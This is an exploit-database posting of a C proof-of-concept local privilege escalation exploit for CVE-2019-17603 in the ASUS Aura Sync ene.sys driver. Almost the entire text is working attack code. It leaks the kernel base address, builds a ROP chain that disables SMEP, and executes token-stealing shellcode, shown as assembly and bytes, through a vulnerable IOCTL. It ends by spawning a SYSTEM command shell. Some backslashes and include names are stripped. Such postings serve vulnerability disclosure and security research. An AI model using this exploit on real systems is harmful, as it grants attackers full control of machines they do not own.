ASUS Aura Sync 1.07.71 Privilege Escalation ≈ Packet Storm
// Discovered by @dhn_
// Author of PoC: Connor McGarr (@33y0re - https://connormcgarr.github.io)
// Windows 10 RS1 Version 10.0.14393 Build 14393
// Tested with VBS, HyperGuard, and PatchGuard disabled
#include
#include
#include
// Vulnerable IOCTL in ene.sys
#define IOCTL_CODE 0x80102040
unsigned long long kernelBase()
{
// Defining EnumDeviceDrivers() parameters
LPVOID lpImageBase[1024];
DWORD lpcbNeeded;
// Calling EnumDeviceDrivers()
printf("[+] Calling EnumDeviceDrivers()...n");
BOOL baseofDrivers = EnumDeviceDrivers(
lpImageBase,
sizeof(lpImageBase),
&lpcbNeeded
);
// Error handling
if (!baseofDrivers)
{
printf("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %dn", GetLastError());
exit(1);
}
// ntoskrnl.exe is the first module dumped in the array
// Typcasting LPVOID to unsigned long long
unsigned long long krnlBase = (unsigned long long)lpImageBase[0];
// Print update for kernel base
printf("[+] Found kernel leak!n");
printf("[+] ntoskrnl.exe is located at: 0x%llxn", krnlBase);
return krnlBase;
}
void exploitWork(void)
{
/*
[BITS 64]
_start:
mov rax, [gs:0x188] ; Current thread (_KTHREAD)
mov rax, [rax + 0xb8] ; Current process (_EPROCESS)
mov rbx, rax ; Copy current process (_EPROCESS) to rbx
__loop:
mov rbx, [rbx + 0x2e8] ; ActiveProcessLinks
sub rbx, 0x2e8 ; Go back to current process (_EPROCESS)
mov rcx, [rbx + 0x2e0] ; UniqueProcessId (PID)
cmp rcx, 4 ; Compare PID to SYSTEM PID
jnz __loop ; Loop until SYSTEM PID is found
mov rcx, [rbx + 0x358] ; SYSTEM token is @ offset _EPROCESS + 0x358
and cl, 0xf0 ; Clear out _EX_FAST_REF RefCnt
mov [rax + 0x358], rcx ; Copy SYSTEM token to current process
xor rax, rax ; STATUS_SUCCESS
add rsp, 0xa0 ; Restore execution
ret ; Done!
*/
char payload[] = "x65x48x8Bx04x25x88x01x00x00x48x8Bx80"
"xB8x00x00x00x48x89xC3x48x8Bx9BxF0"
"x02x00x00x48x81xEBxF0x02x00x00x48"
"x8Bx8BxE8x02x00x00x48x83xF9x04"
"x75xE5x48x8Bx8Bx58x03x00x00x80"
"xE1xF0x48x89x88x58x03x00x00x48x31xC0"
"x48x81xC4xA0x00x00x00xC3";
// Allocating shellcode in user mode
LPVOID shellcode = VirtualAlloc(
NULL,
sizeof(payload),
0x3000,
0x40
);
// Error handling
if (!shellcode)
{
printf("[-] Error! Unable to allocate shellcode in user mode. Error: %dn", GetLastError());
exit(1);
}
// Print statement for exploit
printf("[+] CVE-2019-17603: ASUS Aura Sync 1.07.71 'ene.sys' EoP Kernel Exploitn");
// Print update for shellcode location
printf("[+] Shellcode allocated at: 0x%llxn", shellcode);
// Moving memory into allocated space in user mode
RtlMoveMemory(
shellcode,
payload,
sizeof(payload)
);
// Running kernelBase() here to get base of kernel for ROP gadgets
unsigned long long baseAddress = kernelBase();
// Defining buffer and buffer size to send to the driver
char buf [88];
size_t gadgetSize = 0x8;
// ROP gadgets are for Windows 10 RS1 Version 10.0.14393 Build 14393
// Run rp++ on the target before execution to adjust offsets accordingnly
// rp++.exe -f C:Windowssystem32ntoskrnl.exe -r 5 >> NTOSKRNL_GADGETS.exe
// Defining ROP gadgets
unsigned long long ROP1 = baseAddress + 0x4666b; // pop rcx ; ret: ntoskrnl.exe
unsigned long long ROP2 = 0x70678; // Intended CR4 value (0x70678) Windows 10 RS1 Version 10.0.14393 Build 14393
unsigned long long ROP3 = baseAddress + 0x1d87d7; // mov cr4, rcx ; ret: ntoskrnl.exe
// Using memset to copy memory into array
memset(buf, 0x41, 88);
// Print update for ROP chain
printf("[+] Exedcuting ROP chain to disable SMEP...n");
memcpy(&buf[56], &ROP1, gadgetSize);
memcpy(&buf[56+8], &ROP2, gadgetSize);
memcpy(&buf[56+16], &ROP3, gadgetSize);
memcpy(&buf[56+24], &shellcode, 0x8);
// Obtaining handle to the driver
printf("[+] Obtaining handle to the driver via CreateFileA()...n");
HANDLE drvHandle = CreateFileA(
"\\.\EneIo",
0xC0000000,
0x0,
NULL,
0x3,
0x0,
NULL
);
// Error handling
if (!drvHandle)
{
printf("[-] Error! Unable to obtain a handle to the driver. Error: %dn", GetLastError());
exit(1);
}
// Print update for HANDLE
printf("[+] Handle to the driver: %dn", drvHandle);
// Sending buffer to the driver
// Defining lpBytesReturned parameter
DWORD lpBytesReturned;
// Invoking IOCTL routine
BOOL sendIoctl = DeviceIoControl(
drvHandle,
IOCTL_CODE,
buf,
sizeof(buf),
NULL,
0,
&lpBytesReturned,
NULL
);
// Error handling
if (!sendIoctl)
{
printf("[-] Error! Unable to interact with the driver. Error: %dn", GetLastError());
exit(1);
}
printf("[+] Interacting with the driver...n");
}
int main(int argc, char *argv[])
{
exploitWork();
// Print update for NT AUTHORITYSYSTEM shell
printf("[+] Enjoy the NT AUTHORITY\SYSTEM shell!n");
// Spawning an NT AUTHORITYSYSTEM shell
system("cmd.exe /c cmd.exe /K cd C:\");
return 0;
}
Gloss